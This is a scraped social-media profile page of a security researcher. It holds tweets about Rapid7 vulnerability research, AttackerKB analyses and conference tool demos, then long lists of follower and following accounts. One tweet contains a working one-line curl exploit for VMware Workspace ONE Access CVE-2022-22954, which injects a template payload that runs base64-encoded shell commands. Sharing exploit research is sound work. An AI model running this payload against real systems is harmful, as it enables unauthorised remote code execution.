Matthew Kienow @HacksForProfit
hacks for fun and profit / software engineer / security researcher PGP: 9DCD 23A2 0181 B684 C21C 0ED2 9903 D880 6069 F788 keybase.io/inokii Joined August 2014-
Tweets793
-
Followers466
-
Following542
-
Likes407
🎥 Missed runZero Hour live? Catch it on demand! We recap Hacker Summer Camp highlights: ✅ @hdmoore on SSH vulns + SSHamble updates ✅ Akheron Proxy w/ @HacksForProfit & @Percent_X ✅ @todb unveils EPSS Pulse ✅ OT protocol insights from Rob King 👉 runzero.com/resources/runz…
🎙 Hacker Summer Camp recap drops today on runZero Hour! ✅ @hdmoore on SSH vulns + SSHamble ✅ Akheron Proxy w/ @HacksForProfit & @Percent_X ✅ @todb unveils EPSS Pulse ✅ Rob King on OT detection across protocol gateways. 📅 Aug 20 | 10AM PT 🔗 runzero.com/research/runze…
🗣️ Happening today at Black Hat Arsenal! Join @HacksForProfit & @Percent_X at 11am PDT for a live demo of Akheron Proxy, a tool for bridging, capturing, replaying, and manipulating UART inter-chip communications. 📍 Business Hall, Arsenal Station 9 🔗 runzero.com/black-hat-arse…
I'm excited to announce our "Out-of-Band" series; focused on the security risks of management devices like BMCs, serial servers, and KVMs. "Out-of-Band, Part 1: The new generation of IP KVMs and how to find them" is now live at: runzero.com/blog/oob-p1-ip…
A PSA for why you should probably not use Postman (it can leak secrets to them): anonymousdata.medium.com/postman-is-log…
I spoke with @robertvamosi on ErrodCode podcast awhile back on "Hacking Cellular-Enabled IoT Devices" We had a fun conversation. The podcast was just published so please check it out - errorcode.podbean.com/e/ep-52-hackin…
We have just published our AttackerKB @rapid7 Analysis for CVE-2024-47575, the recent FortiManager 0day, aka FortiJump 🔥 Read our full technical analysis; detailing firmware decryption, protocol analysis, and unauthenticated RCE 🚀 attackerkb.com/topics/OFBGprm…
CVE and vendor advisory now available on the #FortiManager 0day that's been knocking around the rumor mill (and evidently some Fortinet customers' email inboxes) for a while. Mitigate immediately, but IOCs need investigating, too. rapid7.com/blog/post/2024…
Rapid7's 2024 Attack Intelligence Report was released today and includes insights from 14 months of vulnerability and exploit analysis, thousands of ransomware incidents, 180+ APT campaigns, and a year+ of Rapid7 incident response findings. rapid7.com/research/repor…
I see "Not all vulnerabilities are created equal" pop up a lot these days in marketing materials for various security companies. We may not have truly been the first to coin that phrase, but AttackerKB's been using it since early 2020! attackerkb.com/about
Full @rapid7 analysis of PAN-OS CVE-2024-3400 now available from @stephenfewer and our stellar new research teammate @ChairNectar! Spoiler: It's a two-vuln exploit chain. attackerkb.com/topics/SSTk336…
Excellent technical analysis
Ahoy! I'm looking for an attack + vulnerability research leader to join @iagox86 and @stephenfewer in driving 0day + n-day research, identifying/developing new attack techniques, and helping set overall research strategy. U.S. ET time zone, job description coming soon. DMs open!
Advisory for a number of document management system (DMS) vulnerabilities I discovered. #XSS rapid7.com/blog/post/2023…
Today is the day! The Metasploit pivoting walkthrough challenge is live on tryhackme.com/christmas. It's free to sign up!
Exploit for VMware Workspace ONE Access CVE-2022-22954: curl -kv https://192.168.0.240/catalog-portal/ui/oauth/verify -H "Host: lol" -Gd error= --data-urlencode 'deviceUdid=${"freemarker.template.utility.Execute"?new()("bash -c {eval,$({echo,aWQ7dW5hbWUgLWE=}|{base64,-d})}")}'
Rapid7's vulnerability intelligence report is out today and features analysis from folks like @Junior_Baines, @zeroSteiner, @tychos_moose and a bunch of the @metasploit team. We tracked hundreds of data points across 50 high-impact vulns. Key points: (1/n) rapid7.com/info/2021-vuln…

Rapid7 @rapid7
123K Followers 3K Following Cybersecurity pros: Rapid7 lets you command your attack surface, smash silos, stay steps ahead of attackers, and take breaches from “inevitable” to preventable.
Whitney Champion 🍪... @shortxstack
30K Followers 11K Following security architect / cofounder @Recon_InfoSec / cofounder @DDI_training / ♥️♥♥ == @eric_capuano, nerdery, rainbows, sweatpants | she/her 🤍🌿🍄🌈🫶
Metasploit Project @metasploit
253K Followers 185 Following Official account of the Metasploit Project, part of the @rapid7 family. Mastodon: @[email protected] Slack: https://t.co/ZOLPDG2O2s
Charles Shirer @bsdbandit
25K Followers 27K Following A Hacker who is A Lover of People, and Life @RetroTwinz @Secbsd, @GrumpyHackers, @NovaHackers, @deadpixelsec @hacknotcrime Advocate @PositivelyBlue_ OSCP, OSWP
Caitlin Condon @catc0n
3K Followers 3K Following Adventurer. Takes a lot of photos, calls many places home. VP of research @VulnCheck. Former research director @Rapid7 / @metasploit. Opinions mine. She/her.
High-Quality Stock Sp... @gcv044f7ks66675
2 Followers 159 Following Stock Market Analysis Buy and Sell High-Quality Stocks 📈 | Manage Your Positions Follow @FoCoBanShop on Twitter Daily High-Quality Stock Recommendations 📈 |
DeborahKitto @1BojX3c78TphJ
8 Followers 1K Following
DayTradeAlerts🇺�... @Yguupvu47238
52 Followers 2K Following 15-30% Monthly | 2 High-Conviction Stocks.Short-Term Gains: 15-20% in Days/Weeks.DM "JOIN" for WhatsApp Alerts. Live Trade Signals • Market Analysis
David @DavidG_IV
3 Followers 42 Following
Awbeacirr @Awbeacirr64525
34 Followers 2K Following
ROIC_KING🇺🇸 @Peailkau193
40 Followers 2K Following 15-30% Monthly | 2 High-Conviction Stocks.Short-Term Gains: 15-20% in Days/Weeks.DM "JOIN" for WhatsApp Alerts. Live Trade Signals • Market Analysis
Lucile Barton-Douglas @barton99006
49 Followers 3K Following
bashar @BashaarIltaadi
35 Followers 620 Following
yeshuibo @yeshuibo
106 Followers 6K Following
Sushant Patil @Ekoscor
1 Followers 131 Following
Matt Boyle @MattJamesBoyle
14K Followers 3K Following Head of Product Engineering @ona_hq. @golang fan boy.
Ulrich Dangel @mr_ud
157 Followers 283 Following
Andy - @G33KatWork@in... @G33KatWork
4K Followers 665 Following I more or less left Twitter. The Musk is too musky.
Alex Read @trickyflipperft
13 Followers 54 Following
Curt Fielding @_CField
295 Followers 793 Following Vulnerability research/exploit dev. Search and Rescue. Mountain runner, skier, climber.
just Red @RedingtonJ35297
11 Followers 146 Following
Edentenzainpublic @Edinpublic
63 Followers 1K Following @edentenza agora também em versão pública no twitter. Podemos de repente dizer que é uma versão 2.0 do mesmo? talvez ,e agora tb muito + :, uncensored e spice !
Action Jackson @FreeMarketRally
87 Followers 286 Following
Raj Samani @Raj_Samani
14K Followers 605 Following Chief Scientist @Rapid7 | @cloudsa | Co-author of @CyberGridBook & CSA Guide to Cloud | Advisor @EC3Europol https://t.co/YpisLrWlVR
Tayseer Sweiti @TayseerSweiti
20 Followers 2K Following
n0hats @n0hats
129 Followers 292 Following Finding vulnerabilities | Learning new tricks thanks to #hackthebox | Always trying to figure out how to improve the status quo
void *huxley @huxley_barbee
283 Followers 2K Following Mastodon: @[email protected] Lead organizer for BSidesNYC
Loxcy @0xLoxcy
4 Followers 59 Following
Security Universal @SecurityUniver1
363 Followers 4K Following IT Security Platform with 24 Dedicated Security Services with a focus on Discovery, Auditing, Monitoring, Response, and Prevention.
danq @danquach_
27 Followers 2K Following
Heyder Andrade @HeyderAndrade
206 Followers 647 Following Skeptical Hacker. Messing around with security as a profession.
hackocracy69 @hackocracy69
194 Followers 2K Following
nomelitas @nomelitas
5 Followers 126 Following
Patrick Kiley @gigstorm
112 Followers 193 Following Principal Security Consultant “Opinions are my own and not the views of my employer”
H4CK3R @Oxford_ukwuta
149 Followers 2K Following Ethical hacker|cyber security enthusiast| Python programmer | full time breaker of things, part time maker
Gisela Hinojosa @gizzyrlz
16 Followers 168 Following
vmkernel @vmkernel
3 Followers 377 Following
Nancy @Nancy37952310
26 Followers 324 Following
AttackerKB @AttackerKb
918 Followers 15 Following Community-driven information, analysis, and discussion of vulnerabilities and threats. Part of the @Rapid7 family.
World Wide Hack @_WorldWideHack
167 Followers 2K Following World Wide Hack is text-based #hacking game with huge #MMO with PvP, PvE, open world and dynamic #story in realistic setting. by #indie team Lotus Innovations
Scott Williams, the C... @80sDweeb
1K Followers 4K Following #InfoSec and IT geek - Firm believer in threat-informed defense. A+/Sec+/ITIL/ServiceNow CSA - “That’s how we’ve always done it” is the enemy of security!
$ @wanted0x
22K Followers 8K Following
nixCraft 🐧 @nixcraft
386K Followers 622 Following Love Linux/Unix, open source, and programming? Into Sysadmin & DevOps? Follow us! Boost your IT career with daily new tools, apps, and humor ⤵️
vx-underground @vxunderground
377K Followers 294 Following The largest collection of malware source code, samples, and papers on the internet. Password: infected
Mick Douglas 🇺🇦... @bettersafetynet
31K Followers 570 Following Consultant for InfoSec Innovations | @SANSInstitute Principal Instructor | @IANS_Security Faculty | I like information security. How about you?
Florian Roth ⚡️ @cyb3rops
207K Followers 3K Following Head of Research @nextronsystems #DFIR #YARA #Sigma | detection engineer | creator of @thor_scanner, Aurora, Sigma, LOKI, YARA-Forge | always busy ⌚️🐇 | vi/vim
Curt @CurtBarnard
448 Followers 500 Following Sometimes I talk about computers. https://t.co/lQqeEELwk9
Dave Kennedy @HackingDave
224K Followers 6K Following Founder @Binary_Defense @TrustedSec Co-Owner https://t.co/HQC75WhdJh. @WeHackHealth Pod. God + Family/Hacker/CSO/USMC/Intel/Fitness. Make the world a better place.
SwiftOnSecurity @SwiftOnSecurity
405K Followers 9K Following computer security person. former helpdesk.
gabsmashh @gabsmashh
108K Followers 3K Following security strategist | 2L JD Candidate | NYU alum | UMGC adjunct professor | USMC & USCG auxiliarist
Robert Graham @ErrataRob
66K Followers 2K Following Created (BlackICE,IPS,sidejacking,masscan). Doing (blog,code,cyber-rights,Internet-scanning). Macrodata refiner.
Will Dormann is on Ma... @wdormann
26K Followers 1K Following I play with vulnerabilities and exploits. I used to be here on Twitter but now I'm here: @[email protected] https://t.co/hXggdAVkSQ
Rapid7 @rapid7
123K Followers 3K Following Cybersecurity pros: Rapid7 lets you command your attack surface, smash silos, stay steps ahead of attackers, and take breaches from “inevitable” to preventable.
🥝🏳️🌈 Be... @gentilkiwi
62K Followers 286 Following A kiwi coding mimikatz & kekeo github: https://t.co/eS3LVgU6i0 Head of security services @banquedefrance Tweets are my own and not the views of my employer
Whitney Champion 🍪... @shortxstack
30K Followers 11K Following security architect / cofounder @Recon_InfoSec / cofounder @DDI_training / ♥️♥♥ == @eric_capuano, nerdery, rainbows, sweatpants | she/her 🤍🌿🍄🌈🫶
scriptjunkie (Matt) @scriptjunkie1
7K Followers 1K Following Documentation is lies. Source is an abstraction. Assembly is the truth. Also at https://t.co/VYFZ0HHnQn and nostr npub10mx0gx3r2lszrrut8kvr5mt2m8r9ffhn
hackerfantastic.x @hackerfantastic
104K Followers 5K Following Co-Founder @myhackerhouse. Cybersecurity & #Web3. Hands-on Hacking (ISBN 9781119561453). Offensive Lua. Christ's Red Team. ✝️
Stephen Fewer @stephenfewer
9K Followers 244 Following Senior Principal Security Researcher @rapid7. Specializing in software vulnerabilities and exploitation.
Metasploit Project @metasploit
253K Followers 185 Following Official account of the Metasploit Project, part of the @rapid7 family. Mastodon: @[email protected] Slack: https://t.co/ZOLPDG2O2s
x0rz @x0rz
96K Followers 420 Following Cybersecurity & Threat Intelligence. Knowledge is power, France is bacon 🥓
Charles Shirer @bsdbandit
25K Followers 27K Following A Hacker who is A Lover of People, and Life @RetroTwinz @Secbsd, @GrumpyHackers, @NovaHackers, @deadpixelsec @hacknotcrime Advocate @PositivelyBlue_ OSCP, OSWP
David Maynor @Dave_Maynor
14K Followers 6K Following No tree, it is said, can grow to heaven, unless it’s roots reach down to hell. Offensive Security, AI LLM Ops, hardware hacking
zerohedge @zerohedge
2.2M Followers 915 Following
Bravos Research @bravosresearch
298K Followers 635 Following Data-driven Investment Research | Follow to learn about markets & the global economy | Get swing trade ideas & market analysis at https://t.co/Jjyd8HqJL4
Saty @satymahajan
57K Followers 0 Following Options trader. Engineer. Gamer. ATR Levels, Pivot Ribbon, Phase Oscillator, and Volume Stack creator. Everything I offer is here: https://t.co/rXzyzG2lwv
TSDR Trading @TSDR_Trading
47K Followers 1K Following TELL. SHOW. DO. REVIEW. Trader from MN. 4 young kids. Live Trading all day, every day. --This is how you win--
manrav @manrav
3K Followers 190 Following | Student of the Market 📝| | Price Action 📈📉 | Chart Patterns 📊 | Options Flow 💰 |
Roaring Kitty @TheRoaringKitty
1.7M Followers 90 Following
Jim Carroll @vixologist
29K Followers 5K Following Portfolio manager specializing in momentum and volatility strategies. Also hack guitar player who sings. Tweets and RTs are not investment advice.
James Boyd @JamesBoydCS
20K Followers 1K Following Education Coach. @SchwabNetwork Contributor. Married, father of 4. Tennis & College 🏈 fan. BBQ lover. Important Disclosures: https://t.co/R8S2cUmT2V
The Kobeissi Letter @KobeissiLetter
1.0M Followers 571 Following Official X account for The Kobeissi Letter, an industry leading commentary on the global capital markets. Email us: [email protected]
Seven @SevenParr
10K Followers 416 Following Exploiting inefficiencies in the financial markets. Posts are opinions and not financial advice.
Proton Mail @ProtonMail
69K Followers 28 Following The standard for email privacy. Built by scientists. Trusted by millions. 🚫 Ads | 🚫 Trackers | 🚫 Compromise 🫶 Free | ⚙️ E2E Encrypted | 🔎 Open-Source
Wolf of My Street🏡 @Ryan__Rigg
74K Followers 471 Following Family First | Data & Market Enthusiast | 2x CS Grad @Uofillinois | Retail Investor & Educator | Tech & AI | Options Flow Hunting @unusual_whales
Adrian Cantrill @adriancantrill
23K Followers 364 Following #bitcoin Posting mainly on nostr https://t.co/JqYnpHcfCs (privacy focused and censorship resistant) AWS Technical Trainer @ https://t.co/eR6AY24r8U
SpaceX @SpaceX
40.1M Followers 120 Following SpaceX designs, manufactures and launches the world’s most advanced rockets and spacecraft
RET2 Systems @ret2systems
12K Followers 1 Following We strive to reimagine vulnerability research, program analysis, and security education as it exists today. An @RPISEC corporation.
Tetsuo @tetsuoai
213K Followers 1K Following Low-level dev since '94 | CS/Math & C/Assembly Projects: @7etsuo @beeldcoin @groktprompt c/asm 🇺🇸
Trifecta Rick @twitwitrk
2K Followers 637 Following Father, Husband, and Chartist. Volume watcher/reversal spotter. All posts are my observation not investment advice. I learn so I evolve @USCMarshall Alum✌️
Kyla Scanlon @kylascan
194K Followers 972 Following All decisions made on the basis of incoming data and the balance of risks | Author of "In This Economy?” | [email protected]
Dmitry Grinberg @dmitrygr
5K Followers 102 Following Creating order out of chaos, or reverse (as needed).
unusualwhales.com Sno... @snorlax_uw
110K Followers 237 Following Options Flow by https://t.co/CoBM8tcNWc (code snor14x 14% off) Email support@unusualwhales for account help Not financial advice / Flow is time sensitive
Quant Data @QuantData
42K Followers 73 Following Bridging the gap between institutions & retail traders since August, 2020. Our tweets are for informational purposes only.
Anthony Sandford @AnthonySandford
30K Followers 143 Following Flow Is Time Sensitive | @Unusual_Whales Partner 🐳 | Stock Hub Discord Access ➡️ https://t.co/3YDeZCqku7 | Not Financial Advice
SentimenTrader @sentimentrader
261K Followers 652 Following The Sentimentrader Advantage: Over 20 years of exclusive, data-driven insights and unrivaled market sentiment tools.
A.P @Limitlesss1
9K Followers 970 Following Jesus| 🇬🇭 | 🇺🇸 | $SPY Options Enthusiast| Gamma Guy| Not Financial Advice| Profitable Options | Learn with me: https://t.co/65pq7n2fGI
Álvaro Prieto @alvaroprieto
4K Followers 605 Following Electrical/Firmware Engineer, maker, traveler. @unnamed_show co-host. https://t.co/E8DRB4f3uB
Matt Boyle @MattJamesBoyle
14K Followers 3K Following Head of Product Engineering @ona_hq. @golang fan boy.
POC_Crew 👨👩�... @POC_Crew
7K Followers 678 Following Organizer of Zer0Con, MOSEC and #POC2025 (https://t.co/LP1W4KC4vY)
kitze @thekitze
74K Followers 628 Following https://t.co/OTHKhGcWrU - fix your life fr https://t.co/BaMlf8oBGj - be 10x faster webdev https://t.co/EpRflP3CGs - FINALLY SHIP
Christoph Nakazawa @cpojer
28K Followers 126 Following ceo at https://t.co/yePM4nWXOi built Athena Crisis, fbtee, jest, metro, yarn and mootools
Pedram Amini @pedramamini
7K Followers 853 Following Repeat founder, investor, hacker. Chief Scientist @OPSWAT. Advisor @ExodusIntel & @0dinai, Previously created @theZDI and OpenRCE. NYC born, Austin transplant.
Тsфdiиg @tsoding
93K Followers 285 Following Recreational Programming - https://t.co/cPjxUvz266 - https://t.co/EilSXwJsXC - https://t.co/0cNzC7z24Y ⠀⢀⣰⣾⡿⣶⣿⠿⣶ ⢠⣼⣿⣿⣷⣿⣿⣶⠉ ⢸⣿⣿⣿⣿⣿⣿⠀⠀
Ulrich Dangel @mr_ud
157 Followers 283 Following
MISP (@misp@misp-comm... @MISPProject
23K Followers 94 Following MISP - Threat Sharing. An open source software and standards to share, create and validate threatintel and intelligence. Mastodon @[email protected]
AIL Project @ail_project
913 Followers 24 Following AIL Project is an open source project to collect and analyse data to produce security intelligence.
Curt Fielding @_CField
295 Followers 793 Following Vulnerability research/exploit dev. Search and Rescue. Mountain runner, skier, climber.
Christiaan Beek @ChristiaanBeek
10K Followers 2K Following Saved by His Grace • sr dir Threat Analytics @Rapid7 - opinions are my own• Speaker•Former @Foundstone @Intel @Kon_Marine https://t.co/2MSYGTBKuq
Kim Dotcom @KimDotcom
1.7M Followers 19K Following Entrepreneur, Innovator, Gamer, Artist, Internet Freedom Fighter & Father of 6